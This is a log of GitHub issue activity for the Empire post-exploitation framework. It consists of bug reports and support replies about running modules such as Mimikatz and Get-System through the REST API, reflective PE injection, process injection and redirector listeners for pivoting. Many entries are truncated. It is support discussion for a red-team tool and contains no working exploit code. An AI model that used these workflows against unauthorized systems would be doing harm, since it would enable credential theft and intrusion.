[Gist:
Polls the API for a new connection. If there's a new connection, sees if it's High Integrity or not. If not, it elevates

[2020-10-20 22:37] mpgn commented on #297
@Hubbl3 just tested your PR, can confirm it's working perfectly 💯

[2020-10-21 03:21] vinnybod commented on #357
"interact" is exposed via the `modules` endpoints. So to get a specific module's options, you would do:
`GET http://localhost:1337/api/modules/<name>`
And then to execute the module you would hit:
`POST http://localhost:1337/api/modules/<name>` where the body of the post looks something like
[code]

When you post to the modules endpoint, the response contains a taskID. You can use that to check if

[2020-10-22 04:47] #360 closed

[2020-10-22 04:47] #359 closed

[2020-10-22 04:47] #297 closed

[2020-10-22 11:08] iojymbo opened #365 "Add TLS v1.2 support for stager"
__Note:__ Please fill out all sections (if applicable) and do not delete the below section headers, otherwise the bot will close the issue.

## Empire Version
- Empire 3.5.1

## OS Information (Linux flavor, Python version)
- OS: Kali Rolling v2020.3
- Python: Python 3.8.6

## Describe the bug
Empire's flask web server now supports TLS v1.3 and TLS v1.2 only.

![sslscan result](https://i.postimg.c

[2020-10-22 11:08] #365 closed

[2020-10-22 11:18] iojymbo opened #366 "[BUG] Add TLS v1.2 support to all stagers"
__Note:__ Please fill out all sections (if applicable) and do not delete the below section headers, otherwise the bot will close the issue.

## Empire Version
- Empire 3.5.1

## OS Information (Linux flavor, Python version)
- OS: Kali Rolling v2020.3
- Python: Python 3.8.6

## Describe the bug
Empire's flask web server now supports TLS v1.3 and TLS v1.2 only.

![sslscan result](https://i.postimg.c

[2020-10-22 16:45] mikesimone opened #367 "[BUG] Unable to retrieve dependencies in add-Netuser"
__Note:__ Please fill out all sections (if applicable) and do not delete the below section headers, otherwise the bot will close the issue.

## Empire Version
- Empire 3.4.0 BC Security Fork

## OS Information (Linux flavor, Python version)
- OS: Debian 5.8.10-1kali1
- Python: Python 3.8.6

## Describe the bug
Receive the following errors:
[!] Error in retrieving dependencies for function Add-NetU

[2020-10-22 22:32] mikesimone commented on #357
Hi,Vinnybod,
I have given up pretending that I'm not an idiot, and so walk me through this like I'm the dumbest human being alive.
For certain modules, like the persist-registry one, it comes back fine.

However, things like "Get-System" and "Mimikatz" fail.
Via the API, I send in a request to start a module, say, "Mimikatz". The request looks a lot like this:

[code]

No result comes back when I

[2020-10-22 22:46] vinnybod commented on #357
Some modules take a while to run and return back to Empire. The way I do it in Starkiller is I poll the task endpoint every X seconds until I see a result. In your case since you're trying to do a workflow, I would put a cap on that, say check it for 2-3 minutes before failing. Mimikatz in particularly takes a bit to come back, so if you are calling the task result endpoint immediately after queui

[2020-10-22 23:25] mikesimone commented on #357
So...
If I kick off mimikatz, I can leave it for *hours* and it still won't do anything until I go into the console and type "interact <agentname>", at which point, it's instant. It just stacks up the commands until I interact with it, at which point, it's instantaneous. It's clearly waiting until it can dump some output to the screen. Is there some option I have to pass it to make it not wait for

[2020-10-24 10:59] jtheanalytica commented on #331
Hi.
Any one could help please?

[2020-10-24 11:00] jtheanalytica commented on #334
Hi.
Any one could help please?

[2020-10-25 10:11] githubkuyaya opened #369 "[BUG] Invoke-ReflectivePEInjection unable to run python-PE's"
## Empire Version
- latest

## OS Information (Linux flavor, Python version)
- OS: Windows
- Python:

## Describe the bug
Invoke-ReflectivePEInjection is not able to run python-PE's

## To Reproduce
1. Create a simple Hello World python program. I used pyinstaller -F to compile it. It should work when you run it normally.
2. `. ./Invoke-ReflectivePEInjection`
3. `Invoke-ReflectivePEInjection -PEPa

[2020-10-25 10:28] githubkuyaya opened #370 "[BUG] Invoke-ReflectivePEInjection does not pass -ExeArgs"
## Empire Version
- latest

## OS Information (Linux flavor, Python version)
- OS: Windows
- Python:

## Describe the bug
Invoke-ReflectivePEInjection does not pass any -ExeArgs to the .exe.

## To Reproduce
Steps to reproduce the behavior:
1. `. .\Invoke-ReflectivePEInjection`
2. `Invoke-ReflectivePEInjection -PEPath C:\PathToAnyExe -ExeArgs "SomeArgs"

## Expected behavior
Invoke-ReflectivePEInj

[2020-10-26 16:11] gmargarida1979 opened #372 "Unabel to download files"
Hi! Installed Empire 3.0.1 without any error and everything seems to work perfectly; but, when I try do download any file from target system it shows the error as screenshot here; When downloading, I m on the same directory where the file is located;
Can you please give me some advice on this?
Thanks!
![Captura de ecrã de 2020-10-26 16-10-56](https://user-images.githubusercontent.com/73487930/9719

[2020-10-26 16:11] #372 closed

[2020-10-26 19:13] mpgn commented on #372
run "Shell pwd" and check the path or use "download full_path"

[2020-10-27 12:50] w1ld3r opened #373 "[FEATURE REQUEST] Create listener totaly in CLI"
**Is your feature request related to a problem? Please describe.**
Unable to create listener without using the Empire shell.
It can be intersting for automated generation of payloads to don't have to use the Empire shell to create a listener.

**Describe the solution you'd like**
Be able to create listener in CLI.

**Describe alternatives you've considered**
For know to create a listener we have t

[2020-10-28 00:18] Cx01N commented on #373
@w1ld3r Is this different from the last issue https://github.com/BC-SECURITY/Empire/issues/199?
We fixed the issue a while back and it should be working. If there is a bug then please submit an issue for that.

[2020-10-28 18:09] fm1ck3y opened #377 "RESTful API (Upload)"
Is your feature request related to a problem? Please describe.
I am trying to upload a file to the agent using RESTful API, every time I try to do it, I just don't get the file loaded. In results gives out to None.
I apologize in advance, I do not know where to write to.
Screen Python Code:
![123](https://user-images.githubusercontent.com/34456690/97478218-b25ea000-1961-11eb-82e8-14ecb8f643ca.png)

[2020-10-28 18:09] #377 closed

[2020-10-28 18:15] fm1ck3y opened #378 "[FEATURE REQUEST] Trouble with uploads in RESTful API"
##  Is your feature request related to a problem? Please describe.
I am trying to upload a file to the agent using RESTful API, every time I try to do it, I just don't get the file loaded.

## Describe the solution you'd like
I want to upload a file to an agent using RESTful API

## Describe alternatives you've considered
-

## Additional context
I apologize in advance, I do not know where to writ

[2020-10-29 03:50] Cx01N commented on #378
@fm1ck3y In the future, please open issues if you are having a problem or ask for assistance on your [Discord](https://discord.com/invite/P8PZPyf). We will need a bit more information to help you out, but I highly encourage getting in our channel if you are trying to code your own API client since that doesn't fall as a feature request or bug.

[2020-10-29 03:50] #378 closed

[2020-10-30 18:24] Cx01N commented on #369
Just so we know what to test later this week. Can you update this to include the version of Empire and Windows (including build)? Thanks.

[2020-10-30 18:25] Cx01N commented on #370
Just so we know what to test later this week. Can you update this to include the version of Empire and Windows (including build)? Thanks.

[2020-10-30 18:36] Cx01N commented on #367
Seems like it was removed a while back and I am not sure why. I'm going to re-add it and hope it doesn't break something elsewhere. Let us know if this works and we will get it fixed in the next build. https://github.com/BC-SECURITY/Empire/pull/381

[2020-11-01 11:55] githubkuyaya commented on #369
Done :).

[2020-11-01 11:55] githubkuyaya commented on #370
Done :).

[2020-11-04 16:23] flannel-guy opened #386 "[BUG] Unable to create more than 1 'redirector' listener"
__Note:__ Please fill out all sections (if applicable) and do not delete the below section headers, otherwise the bot will close the issue.

## Empire Version
- Empire 3.5.1

## OS Information (Linux flavor, Python version)
- OS: Kali 2020.3
- Python: 3.8.6

## Describe the bug
I am unable to start more than one 'redirector' listener at one time. Prevents pivoting through more than a single end-ta

[2020-11-07 05:01] techbud opened #387 "[BUG] Kali 2020 Failure on Loading"
__Note:__ Please fill out all sections (if applicable) and do not delete the below section headers, otherwise the bot will close the issue.

## Empire Version
- Empire 3.5.2

## OS Information (Linux flavor, Python version)
- OS: Kali Linux Version 2020.4
- Python: 3.9.0+

## Describe the bug
I try to run the program with sudo and get this error:
![image](https://user-images.githubusercontent.com/

[2020-11-07 18:14] graylordo opened #388 "[BUG] psinject http not work in win7"
__Note:__ Please fill out all sections (if applicable) and do not delete the below section headers, otherwise the bot will close the issue.

## Empire Version
- Empire 3.5.2

## OS Information (Linux flavor, Python version)
- OS: Ubuntu 20.10
- Python: latest (system updated always)

## Describe the bug
I tested module - psinject http on windows 7 - it doesn't work: used Windows 7 sp 1 - stock (MS

[2020-11-07 19:04] techbud commented on #387
I tried to do a reinstall after updating python and still no go.

[2020-11-07 21:55] Cx01N commented on #387
@techbud I'm sorry you are having issues with the install. Can you let us know which method you use to install since there are a few different options that we offer now?

[2020-11-07 21:58] Cx01N commented on #388
Unfortunately, we are going to need a bit more info to try to reproduce this. Can you tell us the current version of python you are running (latest can mean a lot of things)? What process you were trying to inject into? Did you try another process or were they all giving the same error? If you use Kali or docker, do you receive the same issue?

[2020-11-07 22:03] techbud commented on #387
Well The first run, it was installed through the Pentesters Framework. I ran update_install_all on the framework, it was what the book I was reading said to use. Then when that failed I used the git method. Then I ran the install.sh, I also couldn't install poetry like your guide said.

Then after I realized I was running an older version of python. I changed it. Then tried a fresh install using g

[2020-11-07 23:33] techbud commented on #387
Had this in a virtual machine and a created a checkpoint before all installs. Going to try to revert back and then try before the pentest framework installation. And be sure I'm on the newest python first too.

[2020-11-07 23:47] techbud commented on #387
Alright, so if I did reverted back to the fresh install. Changed my python version to 3.9 and did sudo install powershell empire and it worked. I'm going to try the Pentest Framework next to see if that was the problem. Seems the fresh install defaults to 2.7 python.

[2020-11-08 00:29] Cx01N commented on #386
@flannel-guy The issue should be fixed, could you give it a try and let me know if it works for you too?

[2020-11-08 00:33] techbud commented on #387
Alright more info, I reverted back again to my checkpoint and changed python to python 3.9. Then trying the install through the pentest framework. It started and when I check my version, it shows its on 2.7 again. So maybe it's something with their installer that switches it to 2.7 manually. We shall see when it is done.